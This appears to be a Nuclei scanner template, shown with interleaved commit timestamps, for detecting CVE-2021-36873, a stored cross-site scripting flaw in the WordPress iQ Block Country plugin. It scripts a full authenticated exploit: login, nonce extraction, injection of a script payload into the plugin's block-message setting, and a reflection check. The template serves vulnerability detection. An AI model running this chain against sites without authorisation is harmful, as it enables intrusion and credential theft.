2022-09-23 09:23:00 +00:00
id : CVE-2021-36873
info :
2022-09-29 13:38:41 +00:00
name : WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting
2022-09-23 09:23:00 +00:00
author : theamanrawat
2022-09-29 13:52:24 +00:00
severity : medium
2022-09-23 09:23:00 +00:00
description : |
2022-09-29 13:38:41 +00:00
WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-09-23 09:23:00 +00:00
reference :
- https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58
2022-09-23 10:43:26 +00:00
- https://wordpress.org/plugins/iq-block-country/
2022-09-23 09:23:00 +00:00
- https://patchstack.com/database/vulnerability/iq-block-country-/wordpress-iq-block-country-plugin-1-2-11-authenticated-persistent-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2021-36873
classification :
2022-09-23 11:08:59 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
2022-09-23 09:23:00 +00:00
cve-id : CVE-2021-36873
2022-09-23 11:08:59 +00:00
cwe-id : CWE-79
2022-09-23 09:23:00 +00:00
metadata :
2022-09-23 11:08:59 +00:00
verified : "true"
tags : cve,wp-plugin,iq-block-country,cve2021,wordpress,wp,xss,authenticated,wpscan
2022-09-23 09:23:00 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host : localhost
Content-Type : application/x-www-form-urlencoded
option_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on
- |
GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1
Host : {{Hostname}}
req-condition : true
cookie-reuse : true
matchers :
- type : dsl
dsl :
2022-09-23 10:43:26 +00:00
- contains(all_headers_4, "text/html")
- status_code_4 == 200
2022-09-23 09:23:00 +00:00
- contains(body_4, 'blockcountry_blockmessage\">test</textarea><script>alert(document.domain)</script>')
2022-09-23 10:43:26 +00:00
- contains(body_4, '<h3>Block type</h3>')
2022-09-23 09:23:00 +00:00
condition : and
extractors :
- type : regex
name : nonce
group : 1
regex :
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal : true
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28